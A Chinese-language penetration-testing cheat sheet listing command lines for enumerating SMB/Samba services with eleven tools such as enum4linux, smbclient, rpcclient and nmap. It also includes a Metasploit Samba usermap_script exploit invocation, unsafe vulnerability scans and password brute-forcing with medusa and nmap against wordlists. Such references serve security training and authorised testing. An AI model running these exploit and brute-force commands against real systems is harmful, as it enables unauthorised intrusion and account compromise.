本文仅列出相关工具及常见用法,具体使用工具使用教程及命令请自行学习。
按照工具分类列出以下十一种枚举方式:
一、enum
enum -s <目标ip>
enum -U <目标ip>
enum -P <目标ip>
二、enum4linux
enum4linux -n <目标ip>
enum4linux -a <目标ip>
三、Metasploit
Msfconsole;use scanner/smb/smb_version
#msf> resource smb_checks.rc
Or
# msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc"
#msf> resource smb_validate.rc
Or
#msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc"
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
四、ngrep
"ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\<目标ip>"
五、nmap/medusa
nmap --script=smb-enum* --script-args=unsafe=1 -T5 <目标ip>
nmap --script smb-enum-shares -p139,445 -T4 -Pn <目标ip>
nmap --script smb-vuln* -p139,445 -T4 -Pn <目标ip>
枚举用户后可以强行登陆
medusa -h <目标ip> -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt <目标ip> -vvvv
nmap –script smb-brute <目标ip>"
六、nmblookup
nmblookup -A <目标ip>
七、rpcclient
rpcclient -U "" -N $ip
rpcclient -U " " <目标ip>
rpcclient -U " " -N <目标ip>
八、samrdump.py
工具目录: /usr/share/doc/python3-impacket/examples/samrdump.py
python3 samrdump.py <目标ip>
九、smbclient
echo exit | smbclient -L \\$ip
smbclient \\<目标ip>\<share>
smbclient -L //<目标ip> -N
smbclient -L \\<目标ip>\
smbclient //<目标ip>/IPC$ -N
smbclient //$ip/share -U username
smbclient \\<目标ip>\<share>
smbclient //<目标ip>/<share>
smbclient //<目标ip>/<share name>
smbclient //<目标ip>/<""share name"">"smbclient //<目标ip>/<""share name"">"
十、smbmap
smbmap -H <目标ip> -R <sharename>
smbmap -H <目标ip>
十一、smbver script
smbver.sh <目标ip>
smbver脚本地址:
https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh
